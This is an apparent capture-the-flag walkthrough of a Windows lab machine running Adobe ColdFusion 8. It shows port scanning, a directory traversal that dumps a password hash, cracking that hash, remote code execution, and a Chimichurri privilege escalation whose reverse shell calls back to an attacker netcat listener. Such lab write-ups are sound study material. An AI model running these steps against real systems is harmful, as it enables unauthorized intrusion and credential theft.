Recon
nmap
1
2
3
4
5
6
7
|
└─$ rustscan -a 10.10.10.11 -b 2500 -- -T5 -Pn -sV -A
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
8500/tcp open fmtp? syn-ack
49154/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
We face a Windows machine with only a rpc service and an unknown service on port 8500.
While browsing, I found that port 8500 as been assigned to Adobe ColdFusion.
Vulnerabilities
Running a searchexploit
research, we found that Adobe ColdFusion as several vulnerabilities on multiple version.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
└─$ searchsploit adobe cold
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) | windows/remote/50781.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting | cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit) | multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Quer | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' C | cfm/webapps/33168.txt
----------------------------------------------------------------------------------- ---------------------------------
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
└─$ python2 14641.py 10.10.10.11 8500 ../../../../../../../lib/password.properties
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Press 'q' or Ctrl-C to abort, almost any other key for status
happyday (?)
|
First shell
1
2
3
4
5
6
7
|
# Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
C:\ColdFusion8\runtime\bin>whoami
arctic\tolis
C:\Users\tolis\Desktop>type user.txt
**************************879c17
|
Path to the privesc
Local recon
Windows-exploit-suggester
1
2
3
4
5
6
7
8
|
└─$ python2 windows-exploit-suggester.py -d 2022-09-06-mssb.xls -i sysinfo -l
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done
|
We found that the there is a vulnerability in the Tracing Feature for Services that could allow an elevation of privilege.
After finding an exploit on github, I upload it on the target and execute it.
1
2
3
4
5
6
7
8
9
10
11
|
# On the target
C:\Windows\Temp\c>.\Chimichurri.exe 10.10.16.11 4446
# On the host
└─$ rlwrap nc -lnvp 4446
C:\Windows\Temp\c>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
**************************b97a0a
|
We are now system owner! We can get the root flag :)
Easy, External, CMS, Penetration Tester Level 1, Unrestricted File Upload, A06:2021-Vulnerable And Outdated Components, Windows Vulnerabilities, Misconfiguration